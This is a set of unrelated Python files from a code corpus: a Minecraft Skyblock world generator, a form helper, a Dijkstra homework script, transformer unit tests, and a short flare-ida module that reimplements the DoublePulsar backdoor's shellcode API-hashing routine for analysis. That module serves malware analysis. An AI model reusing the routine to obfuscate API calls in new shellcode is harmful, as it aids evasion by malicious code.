book_tag['title'] = title
book_tag['author'] = author
book_tag['pages'] = TAG_List(name='pages', list_type=TAG_String)
for page in pages:
book_tag['pages'].append(TAG_String(page))
item_tag = TAG_Compound()
item_tag['id'] = TAG_Short(items.names['Written Book'])
item_tag['Damage'] = TAG_Byte(0)
item_tag['Count'] = TAG_Byte(1)
item_tag['tag'] = book_tag
return item_tag
def make_chest(level, chunk, pos, contents):
x, z, y = pos
chest_id = level.materials.Chest.ID
chunk.Blocks[x % 16, z % 16, y] = chest_id
chest_facing_west = 4
chunk.Data[x % 16, z % 16, y] = chest_facing_west
chest = TileEntity.Create('Chest')
TileEntity.setpos(chest, (x, y, z))
slot = 0
for item in contents:
try:
item.name # Already a TAG_Compound?
item['Slot'] = TAG_Byte(slot)
chest['Items'].append(item)
except AttributeError:
item['slot'] = slot
chest['Items'].append(item_stack(item))
slot += 1
chunk.TileEntities.append(chest)
def grabChunk(level, chunkX, chunkZ):
try:
level.createChunk(chunkX, chunkZ)
except ValueError:
pass
chunk = level.getChunk(chunkX, chunkZ)
# TODO: Determine if the following call is necessary
chunk.chunkChanged()
return chunk
def clear(level, chunkX, chunkZ):
chunk = grabChunk(level, chunkX, chunkZ)
chunk.Blocks[:, :, :] = 0 # air_id
chunk.Biomes[:, :] = -1 # not yet calculated
chunk.chunkChanged()
return chunk
def create_empty_chunks(level, radius=0):
for chunkX in range(-radius, radius + 1):
for chunkZ in range(-radius, radius + 1):
level.createChunk(chunkX, chunkZ)
def create_bedrock_fence(level, radius=0):
bedrock_id = level.materials.Bedrock.ID
for chunkX in range(-radius, radius + 1):
for chunkZ in range(-radius, radius + 1):
if abs(chunkX) == radius or abs(chunkZ) == radius:
chunk = grabChunk(level, chunkX, chunkZ)
chunk.Blocks[:, :, :128] = bedrock_id
def dirt_island(level, chunkX, chunkZ):
# Main
clear(level, chunkX, chunkZ)
chunk = level.getChunk(chunkX, chunkZ)
# Dirt
dirt_id = level.materials.Dirt.ID
chunk.Blocks[base:base+8, base:base+4, 60:64] = dirt_id
chunk.Blocks[base:base+4, base+4:base+8, 60:64] = dirt_id
# Grass
grass_id = level.materials.Grass.ID
dirt = chunk.Blocks[:, :, 63] == dirt_id
chunk.Blocks[:, :, 63][dirt] = grass_id
chunk.chunkChanged()
# Tree
log_id = level.materials.Wood.ID
leaf_id = level.materials.Leaves.ID
chunk.Blocks[base-1:base+2, base+5:base+10, 67:69] = leaf_id
chunk.Blocks[base-2:base+3, base+6:base+9, 67:69] = leaf_id
chunk.Blocks[base, base+6:base+9, 69:71] = leaf_id
chunk.Blocks[base-1:base+2, base+7, 69:71] = leaf_id
chunk.Blocks[base-2, base+5, 67] = leaf_id
chunk.Blocks[base-2, base+9, 68] = leaf_id
chunk.Blocks[base-1:base+2, base+6:base+9, 69] = leaf_id
chunk.Blocks[base, base+7, 64:70] = log_id
# Chest
contents = [
{
'id': items.names['Ice'],
'count': 1,
'damage': 0,
},
{
'id': items.names['Lava Bucket'],
'count': 1,
'damage': 0,
},
signed_book(
'Book One',
[
'''Contents:
2: Credits
3: Basic Objectives ''', # page 1
'''Credits:
- Noobcrew made the original Skyblock maps
- Intchanter posted ideas in the Skyblock thread
- WesyWesy suggested Intchanter update Skyblock
- CurtJen and Gaudeon: helped test''', # page 2
'''Basic objectives:
- Farm saplings: acacia, birch, dark oak, jungle, oak, spruce
- Farm wheat, melons, pumpkins, cactus, carrots, potatoes
- Farm tall grass, vines, dandelions, poppies''', # page 3
'''- Collect arrows, bones, ender pearls, glass bottles
- Collect glowstone dust, gold nuggets, gunpowder, iron, redstone dust,
- Collect rotten flesh, slime balls, spider eyes, string
- Make charcoal
- Generate cobblestone and smooth stone''', # page 4
'''- Farm beef, chicken, eggs, feathers, ink sacs
- Farm leather, mutton, pork chops, rabbit, rabbit hide, wool
- Make stone tools
- Milk a cow
- Obtain a rabbit foot
- Craft snow golems
- Make leather armor
- Make cake, pumpkin pie, slime blocks''', # page 5
'''- Collect clown fish, fish, lily pads, a nametag
- Collect puffer fish, a saddle, salmon
- Collect a tripwire hook, water bottles''', # page 6
]
),
]
chunkX *= 16
chunkZ *= 16
make_chest(level, chunk, (chunkX+base+7, chunkZ+base+2, 64), contents)
def sand_island(level, chunkX, chunkZ):
# Main
clear(level, chunkX, chunkZ)
chunk = level.getChunk(chunkX, chunkZ)
# Sand
sand_id = level.materials.Sand.ID
chunk.Blocks[base:base+4, base:base+4, 60:64] = sand_id
# Cactus
cactus_id = level.materials.Cactus.ID
chunk.Blocks[base, base+3, 64] = cactus_id
# Chest
contents = [
{'id': items.names['Obsidian'],
'count': 10, 'damage': 0},
# {'id': items.names['Melon Slice'],
{'id': 360, # items.names['Melon'],
'count': 1, 'damage': 0},
{'id': items.names['Spruce Sapling'],
'count': 2, 'damage': 1},
{'id': items.names['Pumpkin Seeds'],
'count': 1, 'damage': 0},
]
# Entities need the world-wide coordinates?!
chunkX *= 16
chunkZ *= 16
make_chest(level, chunk, (chunkX+base+3, chunkZ+base+3, 64), contents)
chunk.chunkChanged()
def soul_sand_island(level, chunkX, chunkZ):
chunk = level.getChunk(chunkX, chunkZ)
# Soul Sand
soul_sand_id = level.materials.SoulSand.ID
chunk.Blocks[base:base+4, base:base+4, 60:64] = soul_sand_id
# Obsidian
obsidian_id = level.materials.Obsidian.ID
chunk.Blocks[base-1, base+1:base+3, 63] = obsidian_id
chunk.Blocks[base-1, base+1:base+3, 67] = obsidian_id
chunk.Blocks[base-1, base, 64:67] = obsidian_id
chunk.Blocks[base-1, base+3, 64:67] = obsidian_id
# Portal
portal_id = level.materials.NetherPortal.ID
chunk.Blocks[base-1, base+1:base+3, 64:67] = portal_id
chunk.Data[base-1, base+1:base+3, 64:67] = 2
# Chest
contents = [
{'id': items.names['Ice'],
'count': 1, 'damage': 0},
{'id': 6, # items.names['Dark Oak Sapling'],
'count': 2, 'damage': 5},
{'id': items.names['Birch Sapling'],
'count': 2, 'damage': 2},
{'id': items.names['Sugar Canes'],
'count': 1, 'damage': 0},
signed_book(
'Book Two',
[
'''Contents:
2: Advanced Objectives
4: Extreme Objectives
6: Crazy Objectives
7: Special Locations''', # page 1
'''Advanced Objectives:
- Collect ghast tears, gold
- Obtain records
- Fight or tame a wolf
- Milk a mooshroom
- Farm the other short flowers:
- red, orange, pink, white tulips
- oxeye daisy, azure bluet, allium, blue orchid''', # page 2
'''- Farm brown and red mushrooms, cocoa beans, nether wart, sugar cane
- Light off a fireworks show''', # page 3
'''Extreme Objectives:
- Collect obsidian
- Farm iron
- Farm two-block flowers: sunflower, peony, rose bush, lilac
- Farm ferns
- Brew some potions
- Play a record
- Enchant your own tools and armor
- Make iron armor and tools''', # page 4
'''- Cure some villagers
- Obtain emeralds, glass, diamond tools, lapis lazuli, name tags,
saddles, enchanted tools, and armor from villagers
- Collect blaze rods, coal, and wither skeleton heads''', # page 5
'''Crazy Objectives:
- Obtain a head from something that isn't a wither skeleton
- Build and kill a wither
- Build a beacon
- Collect lava, gravel, netherrack
- Craft an arrow''', # page 6
'''Special locations:
Nether fortress: -16x,-16z
End portal: 800x,-160z
''', # page 7
],
)
]
chunkX *= 16
chunkZ *= 16
make_chest(level, chunk, (chunkX+base+3, chunkZ+base+3, 64), contents)
# Mushrooms and Netherwart
red_mushroom_id = level.materials.RedMushroom.ID
brown_mushroom_id = level.materials.BrownMushroom.ID
netherwart_id = level.materials.NetherWart.ID
chunk.Blocks[base+3, base, 64] = red_mushroom_id
chunk.Blocks[base, base+3, 64] = brown_mushroom_id
chunk.Blocks[base, base, 64] = netherwart_id
chunk.chunkChanged()
def bedrock_island(level, chunkX, chunkZ):
clear(level, chunkX, chunkZ)
chunk = level.getChunk(chunkX, chunkZ)
# Bedrock
bedrock_id = level.materials.Bedrock.ID
chunk.Blocks[base:base+8, base:base+8, :8] = bedrock_id
# Air core
air_id = level.materials.Air.ID
chunk.Blocks[base+1:base+7, base+1:base+7, 1:7] = air_id
chunk.Blocks[:, :, 5] = air_id
# End portal frame
frame_id = level.materials.PortalFrame.ID
chunk.Blocks[base+1:base+6, base+2:base+5, 1] = frame_id
chunk.Blocks[base+2:base+5, base+1:base+6, 1] = frame_id
chunk.Blocks[base+2:base+5, base+2:base+5, 1] = air_id
chunk.Data[base+2:base+5, base+1, 1] = 0
chunk.Data[base+5, base+2:base+5, 1] = 1
chunk.Data[base+2:base+5, base+5, 1] = 2
chunk.Data[base+1, base+2:base+5, 1] = 3
# Chest
contents = [
{'id': items.names['Fern'],
'count': 1, 'damage': 2},
{'id': 175, # items.names['Sunflower'],
'count': 1, 'damage': 0},
{'id': 175, # items.names['Lilac'],
'count': 1, 'damage': 1},
{'id': 175, # items.names['Rose Bush'],
'count': 1, 'damage': 4},
{'id': 175, # items.names['Peony Bush'],
'count': 1, 'damage': 5},
{'id': 6, # items.names['Acacia Sapling'],
'count': 2, 'damage': 4},
{'id': 6, # items.names['Jungle Sapling'],
'count': 2, 'damage': 3},
{'id': items.names['Cocoa Beans'],
'count': 1, 'damage': 3},
]
chunkX *= 16
chunkZ *= 16
make_chest(level, chunk, (chunkX+base+3, chunkZ+base+3, 1), contents)
# Light this so it's less likely that something will go terribly wrong and
# destroy the chest. Also, stop stealing spawning slots.
torch_id = level.materials.Torch.ID
chunk.Blocks[base+4, base+4, 1] = torch_id
chunk.chunkChanged()
def obsidian_island(level, chunkX, chunkZ):
# End
chunk = level.getChunk(chunkX, chunkZ)
chunk2 = level.getChunk(chunkX, chunkZ - 1)
# Obsidian
# When the player is teleported to the_end, it appears that they go to
# a fixed point at X:100,Y:49(foot),Z:0.
obsidian_id = level.materials.Obsidian.ID
air_id = level.materials.Air.ID
chunk.Blocks[base-2:base+3, 0:base-1, 44:49] = obsidian_id
chunk2.Blocks[base-2:base+3, base-6:, 44:49] = obsidian_id
chunk.Blocks[base-1:base+2, 0:base-2, 45:48] = air_id
chunk2.Blocks[base-1:base+2, base-5:, 45:48] = air_id
contents = [
{
'id': items.names['Diamond'],
'count': 3,
'damage': 0
},
]
chunkX *= 16
chunkZ *= 16
make_chest(level, chunk, (chunkX+base, chunkZ+base-4, 45), contents)
chunk.chunkChanged()
def portal_island(level, chunkX, chunkZ):
# End
chunk = level.getChunk(chunkX, chunkZ)
# Bedrock frame
bedrock_id = level.materials.Bedrock.ID
chunk.Blocks[base-2:base+3, base-1:base+2, 47] = bedrock_id
chunk.Blocks[base-1:base+2, base-2:base+3, 47] = bedrock_id
chunk.Blocks[base-1:base+2, base-3:base+4, 48] = bedrock_id
chunk.Blocks[base-2:base+3, base-2:base+3, 48] = bedrock_id
chunk.Blocks[base-3:base+4, base-1:base+2, 48] = bedrock_id
# Portal
portal_id = level.materials.EnderPortal.ID
chunk.Blocks[base-2:base+3, base-1:base+2, 48] = portal_id
chunk.Blocks[base-1:base+2, base-2:base+3, 48] = portal_id
# Bedrock spire
chunk.Blocks[base, base, 47:52] = bedrock_id
# Torches
torch_id = level.materials.Torch.ID
(chunk.Blocks[base+0, base-1, 50],
chunk.Data[base+0, base-1, 50]) = (torch_id, 4)
(chunk.Blocks[base+1, base+0, 50],
chunk.Data[base+1, base+0, 50]) = (torch_id, 1)
(chunk.Blocks[base+0, base+1, 50],
chunk.Data[base+0, base+1, 50]) = (torch_id, 3)
(chunk.Blocks[base-1, base+0, 50],
chunk.Data[base-1, base+0, 50]) = (torch_id, 2)
# Dragon Egg
dragon_egg_id = level.materials.DragonEgg.ID
chunk.Blocks[base, base, 52] = dragon_egg_id
chunk.chunkChanged()
def spawn_island(level, east, south, target=(6, 6, 64)):
# TODO: Fill the coordinates based on the actual position of the dirt
# and spawn islands
block_radius = 13
pad_min_east = east - 10
pad_min_south = south - 10
pad_max_east = east + 10
pad_max_south = south + 10
pad_up = 0 # Bottom of the world so we can't ever spawn below it
wire_up = pad_up + 1
redstone_up = wire_up + 1
cap_up = redstone_up + 1
slab_id = 126
slab_data = 0 # oak, lower half
tripwire_id = 132
tripwire_data = 4 + 2 # attached and suspended
tripwire_hook_id = 131
tripwire_hook_n_data = 4 + 0 # connected, pointing south
tripwire_hook_s_data = 4 + 2 # connected, pointing north
redstone_wire_id = 55
command_block_id = 137
bedrock_id = 7
command = u''.join([
u'/tp',
u' @p[{s_east},{s_up},{s_south},{radius},c=100]',
u' {t_east}',
u' {t_up}',
u' {t_south}',
]).format(
t_east=target[0],
t_south=target[1],
t_up=target[2],
s_east=east,
s_south=south,
s_up=wire_up,
radius=block_radius,
)
# Place the player
level.setPlayerPosition((east, wire_up + 2, south))
level.setPlayerSpawnPosition((east, wire_up, south))
# Get a world slice object
world_slice = LevelSlice(
level,
east=east,
south=south,
up=pad_up,
radius=block_radius,
)
world_slice.empty()
# Slab level
world_slice.set_blocks(
block_id=slab_id,
block_data=slab_data,
minimum=(pad_min_east, pad_min_south, pad_up),
maximum=(pad_max_east, pad_max_south, pad_up),
)
# Wire level with fully connected tripwire lined N and S with tripwire
# hooks attached to bedrock
world_slice.set_blocks(
block_id=bedrock_id,
minimum=(pad_min_east, pad_min_south - 2, wire_up),
maximum=(pad_max_east, pad_max_south + 2, wire_up),
)
world_slice.set_blocks(
block_id=tripwire_hook_id,
block_data=tripwire_hook_n_data,
minimum=(pad_min_east, pad_min_south - 1, wire_up),
maximum=(pad_max_east, pad_min_south - 1, wire_up),
)
world_slice.set_blocks(
block_id=tripwire_hook_id,
block_data=tripwire_hook_s_data,
minimum=(pad_min_east, pad_max_south + 1, wire_up),
maximum=(pad_max_east, pad_max_south + 1, wire_up),
)
world_slice.set_blocks(
block_id=tripwire_id,
block_data=tripwire_data,
minimum=(pad_min_east, pad_min_south, wire_up),
maximum=(pad_max_east, pad_max_south, wire_up),
)
# Just above the wire, cap the bedrock on the S and add the redstone
# wire and command block on the N
world_slice.set_blocks(
block_id=slab_id,
minimum=(pad_min_east, pad_max_south + 2, redstone_up),
maximum=(pad_max_east, pad_max_south + 2, redstone_up),
)
world_slice.set_blocks(
block_id=redstone_wire_id,
minimum=(pad_min_east, pad_min_south - 2, redstone_up),
maximum=(pad_max_east, pad_min_south - 2, cap_up),
)
world_slice.set_blocks(
block_id=command_block_id,
minimum=(east, pad_min_south - 2, redstone_up),
maximum=(east, pad_min_south - 2, redstone_up),
)
entity = TileEntity.Create('Control')
entity['Command'] = TAG_String(command)
entity['LastOutput'] = TAG_String(u'')
world_slice.add_entity(entity, (east, pad_min_south - 2, redstone_up))
# Cap redstone wire and command block with slabs
world_slice.set_blocks(
block_id=slab_id,
minimum=(pad_min_east, pad_min_south - 2, cap_up),
maximum=(pad_max_east, pad_min_south - 2, cap_up),
)
world_slice.save()
def biomify(level):
desired_biomes = [
10, # Frozen Ocean
10, # Frozen Ocean
26, # Cold Beach
4, # Forest
27, # Birch Forest
132, # Flower Forest
21, # Jungle
5, # Taiga
6, # Swampland
129, # Sunflower Plains
35, # Savannah
1, # Plains
16, # Beach
0, # Ocean
14, # Mooshroom Island
0, # Ocean
]
radius = len(desired_biomes) - 1
for chunkZ in range(-radius, radius + 1):
for chunkX in range(-radius, radius + 1):
chunk = level.getChunk(chunkX, chunkZ)
biome = desired_biomes[max(abs(chunkX), abs(chunkZ))]
chunk.Biomes[:, :] = biome
chunk.chunkChanged()
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
11359261
|
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from pineboolib.fllegacy.flformdb import FLFormDB
from PyQt5 import QtWidgets
def AQFormDB(action_name: str, parent: "QtWidgets.QWidget") -> "FLFormDB":
"""Return a FLFormDB instance."""
from pineboolib.application.utils.convert_flaction import convertFLAction
from pineboolib.application import project
if project.conn is None:
raise Exception("Project is not connected yet")
ac_flaction = project.conn.manager().action(action_name)
ac_xml = convertFLAction(ac_flaction)
ac_xml.load()
ret_ = ac_xml.mainform_widget
if ret_ is None:
raise Exception("mainform_widget is emtpy!")
return ret_
|
StarcoderdataPython
|
11372477
|
<filename>Homework/Dijkstra.py
# -*- coding: utf-8 -*-
"""
Created on Fri Sep 27 13:08:39 2019
@author: wenbin
"""
"""
this program is the algotithm of dijkstra
注意:本代码的中的节点就是list数组的index,为了和python保持一致,因此下标从0开始,若题目为从1开始,则可将父节点的下标+1
"""
class Dijkstra():
def __init__(self , AdjacencyMatrix , StartVertex):
self.AdjMat = AdjacencyMatrix
self.Vs = StartVertex
print("Dijkstra algotithm start seccessfully , the matrix is:")
print(self.AdjMat)
print("the start vertex is:" , self.Vs )
def DijkstraProcess(self):
"""
this func use Algorithm Dijkstra to deal with the class's data
"""
Msize = len(self.AdjMat) #得到的数据的行数
Vt = [] #已经确定的点的集合
Uvt = [] #还没确定的点的集合
dis = [] #各个点的权重 or 距离
dis_certain = [] #已经确定的各个点的权重
pv = [] #各个点的父节点
for i in range(Msize):
dis.append(float("inf"))
dis_certain.append(float("inf"))
pv.append(None)
dis[self.Vs] = 0
dis[self.Vs] = 0
for i in range(Msize):
MinValue = min(dis)
MinIndex = dis.index(MinValue)
dis_certain[MinIndex] = MinValue
dis[MinIndex] = float("inf")
Vt.append(MinIndex) #将已经确定的点加到Vt中
for j in range(Msize):
if (j != MinIndex and j not in set(Vt)) and self.AdjMat[MinIndex][j] < 1000000000: #判断一下dis[j]是否小于inf
if dis_certain[MinIndex] + self.AdjMat[MinIndex][j] < dis[j]:
dis[j] = dis_certain[MinIndex] + self.AdjMat[MinIndex][j]
pv[j] = MinIndex
print("distance" , dis_certain) #各个节点的最短路,列表中的index就是节点的编号
print("pv" , pv) #各个节点的父节点,从0开始计数
def TestData():
#初始化邻接矩阵
AdjacencyMatrix = [[0, 1, 4 , float("inf"), float("inf")],
[1, 0, float("inf"), 2, float("inf")],
[1, float("inf"), 0, float("inf"), 1],
[float("inf"), 3, float("inf"), 0, 3],
[float("inf"), float("inf"), float("inf"), 2, 0]]
StartVertex = 0 #最短路的起始点
return AdjacencyMatrix , StartVertex
def OR17homework():
#该例子是运筹学书本第10.7题的题目
AdjacencyMatrix = [[0, 2, float("inf") ,8, float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf")],
[float("inf"), 0, float("inf"), 6,1, float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf")],
[1, float("inf"), 0, float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf")],
[float("inf"),float("inf"), 7,0, float("inf"), float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf")],
[float("inf"), float("inf"), float("inf"), 5, 0,float("inf"), float("inf"), float("inf"), 1,float("inf"), float("inf")],
[float("inf"), float("inf"), float("inf"), 1, 3,0,4,float("inf"), float("inf"), float("inf"),float("inf")],
[float("inf"), float("inf"), float("inf"), 2,float("inf"), float("inf"), 0,float("inf"),3,1,float("inf")],
[float("inf"),float("inf"),float("inf"),float("inf"),2,float("inf"),float("inf"),0,float("inf"),float("inf"),9],
[float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),6 , float("inf"),7,0,float("inf"),float("inf")],
[float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),1,0,4],
[float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),2,float("inf"),0]]
StartVertex = 0 #最短路的起始点
return AdjacencyMatrix , StartVertex
if __name__ == "__main__":
# AdjacencyMatrix , StartVertex = TestData()
AdjacencyMatrix , StartVertex = OR17homework()
DijExample = Dijkstra(AdjacencyMatrix , StartVertex)
DijExample.DijkstraProcess()
|
StarcoderdataPython
|
126875
|
<gh_stars>10-100
#!/usr/bin/env python
########################################################################
# Copyright 2012 Mandiant
# Copyright 2014 FireEye
#
# Mandiant licenses this file to you under the Apache License, Version
# 2.0 (the "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
#
# Reference:
# https://github.com/mandiant/flare-ida/blob/master/shellcode_hashes/make_sc_hash_db.py
#
########################################################################
DESCRIPTION = "SHIFT LEFT 7 and SUB used in DoublePulsar backdoor"
TYPE = 'unsigned_int'
TEST_1 = 2493113697
def hash(data):
eax = 0
edi = 0
for i in data:
edi = 0xffffffff & (eax << 7)
eax = 0xffffffff & (edi - eax)
eax = eax + (0xff & i)
edi = 0xffffffff & (eax << 7)
eax = 0xffffffff & (edi - eax)
return eax
|
StarcoderdataPython
|
1681783
|
# Copyright 2022 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for transformer-based bert encoder network."""
from absl.testing import parameterized
import numpy as np
import tensorflow as tf
from official.nlp.modeling.networks import funnel_transformer
class SingleLayerModel(tf.keras.Model):
def __init__(self, layer):
super().__init__()
self.layer = layer
def call(self, inputs):
return self.layer(inputs)
class FunnelTransformerEncoderTest(parameterized.TestCase, tf.test.TestCase):
def tearDown(self):
super(FunnelTransformerEncoderTest, self).tearDown()
tf.keras.mixed_precision.set_global_policy("float32")
@parameterized.named_parameters(
("mix_truncated_avg_rezero", "mixed_float16", tf.float16, "truncated_avg",
"ReZeroTransformer"), ("float32_truncated_avg_rezero", "float32",
tf.float32, "truncated_avg", "ReZeroTransformer"),
("mix_truncated_avg", "mixed_float16", tf.float16, "truncated_avg",
"TransformerEncoderBlock"),
("float32_truncated_avg", "float32", tf.float32, "truncated_avg",
"TransformerEncoderBlock"), ("mix_max", "mixed_float16", tf.float16,
"max", "TransformerEncoderBlock"),
("float32_max", "float32", tf.float32, "max", "TransformerEncoderBlock"),
("mix_avg", "mixed_float16", tf.float16, "avg",
"TransformerEncoderBlock"),
("float32_avg", "float32", tf.float32, "avg", "TransformerEncoderBlock"))
def test_network_creation(self, policy, pooled_dtype, pool_type,
transformer_cls):
tf.keras.mixed_precision.set_global_policy(policy)
hidden_size = 32
sequence_length = 21
pool_stride = 2
num_layers = 3
# Create a small FunnelTransformerEncoder for testing.
test_network = funnel_transformer.FunnelTransformerEncoder(
vocab_size=100,
hidden_size=hidden_size,
num_attention_heads=2,
num_layers=num_layers,
pool_stride=pool_stride,
pool_type=pool_type,
max_sequence_length=sequence_length,
unpool_length=0,
transformer_cls=transformer_cls)
# Create the inputs (note that the first dimension is implicit).
word_ids = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
mask = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
type_ids = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
dict_outputs = test_network([word_ids, mask, type_ids])
data = dict_outputs["sequence_output"]
pooled = dict_outputs["pooled_output"]
self.assertIsInstance(test_network.transformer_layers, list)
self.assertLen(test_network.transformer_layers, num_layers)
self.assertIsInstance(test_network.pooler_layer, tf.keras.layers.Dense)
# Stride=2 compresses sequence length to half the size at each layer.
# For pool_type = max or avg,
# this configuration gives each layer of seq length: 21->11->6->3.
# For pool_type = truncated_avg,
# seq length: 21->10->5->2.
if pool_type in ["max", "avg"]:
expected_data_shape = [None, 3, hidden_size]
else:
expected_data_shape = [None, 2, hidden_size]
expected_pooled_shape = [None, hidden_size]
self.assertAllEqual(expected_data_shape, data.shape.as_list())
self.assertAllEqual(expected_pooled_shape, pooled.shape.as_list())
# The default output dtype is float32.
# If float_dtype is set to float16, the data output is float32 (from a layer
# norm) and pool output should be float16.
self.assertAllEqual(tf.float32, data.dtype)
self.assertAllEqual(pooled_dtype, pooled.dtype)
def test_network_creation_dense(self):
tf.keras.mixed_precision.set_global_policy("mixed_float16")
pool_type = "avg"
hidden_size = 32
sequence_length = 21
dense_sequence_length = 3
pool_stride = 2
num_layers = 3
# Create a small FunnelTransformerEncoder for testing.
test_network = funnel_transformer.FunnelTransformerEncoder(
vocab_size=100,
hidden_size=hidden_size,
num_attention_heads=2,
num_layers=num_layers,
pool_stride=pool_stride,
pool_type=pool_type,
max_sequence_length=sequence_length + dense_sequence_length,
unpool_length=0,
transformer_cls="TransformerEncoderBlock")
# Create the inputs (note that the first dimension is implicit).
word_ids = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
mask = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
type_ids = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
dense_inputs = tf.keras.Input(
shape=(dense_sequence_length, hidden_size), dtype=tf.float32)
dense_mask = tf.keras.Input(shape=(dense_sequence_length,), dtype=tf.int32)
dense_type_ids = tf.keras.Input(
shape=(dense_sequence_length,), dtype=tf.int32)
dict_outputs = test_network(
[word_ids, mask, type_ids, dense_inputs, dense_mask, dense_type_ids])
data = dict_outputs["sequence_output"]
pooled = dict_outputs["pooled_output"]
self.assertIsInstance(test_network.transformer_layers, list)
self.assertLen(test_network.transformer_layers, num_layers)
self.assertIsInstance(test_network.pooler_layer, tf.keras.layers.Dense)
# Stride=2 compresses sequence length to half the size at each layer.
# For pool_type = max or avg,
# this configuration gives each layer of seq length: 24->12->6->3.
expected_data_shape = [None, 3, hidden_size]
expected_pooled_shape = [None, hidden_size]
self.assertAllEqual(expected_data_shape, data.shape.as_list())
self.assertAllEqual(expected_pooled_shape, pooled.shape.as_list())
def test_invalid_stride_and_num_layers(self):
hidden_size = 32
num_layers = 3
pool_stride = [2, 2]
unpool_length = 1
with self.assertRaisesRegex(ValueError,
"pool_stride and num_layers are not equal"):
_ = funnel_transformer.FunnelTransformerEncoder(
vocab_size=100,
hidden_size=hidden_size,
num_attention_heads=2,
num_layers=num_layers,
pool_stride=pool_stride,
unpool_length=unpool_length)
@parameterized.named_parameters(
("no_stride_no_unpool", 1, 0),
("stride_list_with_unpool", [2, 3, 4], 1),
("large_stride_with_unpool", 3, 1),
("large_stride_with_large_unpool", 5, 10),
("no_stride_with_unpool", 1, 1),
)
def test_all_encoder_outputs_network_creation(self, pool_stride,
unpool_length):
hidden_size = 32
sequence_length = 21
num_layers = 3
# Create a small FunnelTransformerEncoder for testing.
test_network = funnel_transformer.FunnelTransformerEncoder(
vocab_size=100,
hidden_size=hidden_size,
num_attention_heads=2,
num_layers=num_layers,
pool_stride=pool_stride,
unpool_length=unpool_length)
# Create the inputs (note that the first dimension is implicit).
word_ids = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
mask = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
type_ids = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
dict_outputs = test_network([word_ids, mask, type_ids])
all_encoder_outputs = dict_outputs["encoder_outputs"]
pooled = dict_outputs["pooled_output"]
expected_data_shape = [None, sequence_length, hidden_size]
expected_pooled_shape = [None, hidden_size]
self.assertLen(all_encoder_outputs, num_layers)
if isinstance(pool_stride, int):
pool_stride = [pool_stride] * num_layers
for layer_pool_stride, data in zip(pool_stride, all_encoder_outputs):
expected_data_shape[1] = unpool_length + (
expected_data_shape[1] + layer_pool_stride - 1 -
unpool_length) // layer_pool_stride
self.assertAllEqual(expected_data_shape, data.shape.as_list())
self.assertAllEqual(expected_pooled_shape, pooled.shape.as_list())
# The default output dtype is float32.
self.assertAllEqual(tf.float32, all_encoder_outputs[-1].dtype)
self.assertAllEqual(tf.float32, pooled.dtype)
@parameterized.named_parameters(
("all_sequence", None, 3, 0),
("output_range", 1, 1, 0),
("all_sequence_wit_unpool", None, 4, 1),
("output_range_with_unpool", 1, 1, 1),
("output_range_with_large_unpool", 1, 1, 2),
)
def test_network_invocation(self, output_range, out_seq_len, unpool_length):
hidden_size = 32
sequence_length = 21
vocab_size = 57
num_types = 7
pool_stride = 2
# Create a small FunnelTransformerEncoder for testing.
test_network = funnel_transformer.FunnelTransformerEncoder(
vocab_size=vocab_size,
hidden_size=hidden_size,
num_attention_heads=2,
num_layers=3,
type_vocab_size=num_types,
output_range=output_range,
pool_stride=pool_stride,
unpool_length=unpool_length)
# Create the inputs (note that the first dimension is implicit).
word_ids = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
mask = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
type_ids = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
dict_outputs = test_network([word_ids, mask, type_ids])
data = dict_outputs["sequence_output"]
pooled = dict_outputs["pooled_output"]
# Create a model based off of this network:
model = tf.keras.Model([word_ids, mask, type_ids], [data, pooled])
# Invoke the model. We can't validate the output data here (the model is too
# complex) but this will catch structural runtime errors.
batch_size = 3
word_id_data = np.random.randint(
vocab_size, size=(batch_size, sequence_length))
mask_data = np.random.randint(2, size=(batch_size, sequence_length))
type_id_data = np.random.randint(
num_types, size=(batch_size, sequence_length))
outputs = model.predict([word_id_data, mask_data, type_id_data])
self.assertEqual(outputs[0].shape[1], out_seq_len) # output_range
# Creates a FunnelTransformerEncoder with max_sequence_length !=
# sequence_length
max_sequence_length = 128
test_network = funnel_transformer.FunnelTransformerEncoder(
vocab_size=vocab_size,
hidden_size=hidden_size,
max_sequence_length=max_sequence_length,
num_attention_heads=2,
num_layers=3,
type_vocab_size=num_types,
pool_stride=pool_stride)
dict_outputs = test_network([word_ids, mask, type_ids])
data = dict_outputs["sequence_output"]
pooled = dict_outputs["pooled_output"]
model = tf.keras.Model([word_ids, mask, type_ids], [data, pooled])
outputs = model.predict([word_id_data, mask_data, type_id_data])
self.assertEqual(outputs[0].shape[1], 3)
